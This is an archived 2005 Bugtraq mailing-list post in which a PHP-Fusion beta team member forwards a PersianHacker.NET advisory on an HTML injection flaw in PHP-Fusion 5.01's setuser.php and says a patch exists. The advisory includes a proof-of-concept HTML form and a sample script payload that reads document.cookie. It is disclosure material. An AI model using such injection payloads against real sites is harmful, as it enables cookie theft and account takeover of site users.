lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sat, 19 Mar 2005 16:24:17 -0500
From: "Sheldon King" <sheldon@...eblitz.com>
To: <bugtraq@...urityfocus.com>
Subject: Fw: [PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection    Vulnerability


A patch has now been made available at php-fusion.co.uk

-Sheldon King
PHP Fusion Beta Team

----- Original Message ----- 
From: "PersianHacker Team" <pi3ch@...oo.com>
To: <bugtraq@...urityfocus.com>
Sent: Saturday, March 19, 2005 3:20 AM
Subject: [PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection 
Vulnerability




[PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection Vulnerability
Date: 2005 March
Bug Number: 10

PHP-Fusion
a light-weight open-source content management system (CMS) written in PHP. 
It utilises a mySQL database to store your site content and includes a 
simple, comprehensive adminstration system. PHP-Fusion includes the most 
common features you would expect to see in many other CMS packages
More info @:
http://php-fusion.co.uk/


Discussion:
--------------------
The software does not properly validate user-supplied input in 
'setuser.php'.

A remote user can access the target user's cookies (including authentication 
cookies),
if any, associated with the site running the PHP-Fusion software, access 
data
recently submitted by the target user via web form to the site, or take 
actions
on the site acting as the target user.


Exploit:
--------------------
<html>

<head>
<title>PHP-Fusion v5.01 Exploit</title>
</head>

<body>

<h1>PHP-Fusion v5.01 Html Injection Exploit</h1>


<form method="POST" action="http://www.example.com/setuser.php">
  <b>XSS in register.php:</b><p>
  Username:
  <input type="text" name="user_name" size="48" value="XSS Injection 
Code"></p>
  <p>
  Password:
  <input type="text" name="user_pass" size="48" value="XSS Injection 
Code"></p>
  <p><input type='checkbox' name='remember_me' value='y'>Remember Me<br><br>
  exmple: &lt;script&gt;document.write(document.cookie)&lt;/script&gt;</p>
  <p>&nbsp;<input type='submit' name='login' value='RUN!' 
class='button'></p>
</form>
<p>&nbsp;</p>
<p align="center"><a 
href="http://www.PersianHacker.NET">www.PersianHacker.NET</a></p>

</body>

</html>


Solution:
--------------------
No solution was available at the time of this entry.


Credit:
--------------------
Discovered by PersianHacker.NET Security Team
by Pi3cH (pi3ch persianhacker net)
http://www.PersianHacker.NET

Special Thanks: devil_box(for xss article), amectris, herbod.


Help
--------------------
visit: http://www.PersianHacker.NET
or mail me @: pi3ch persianhacker net

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ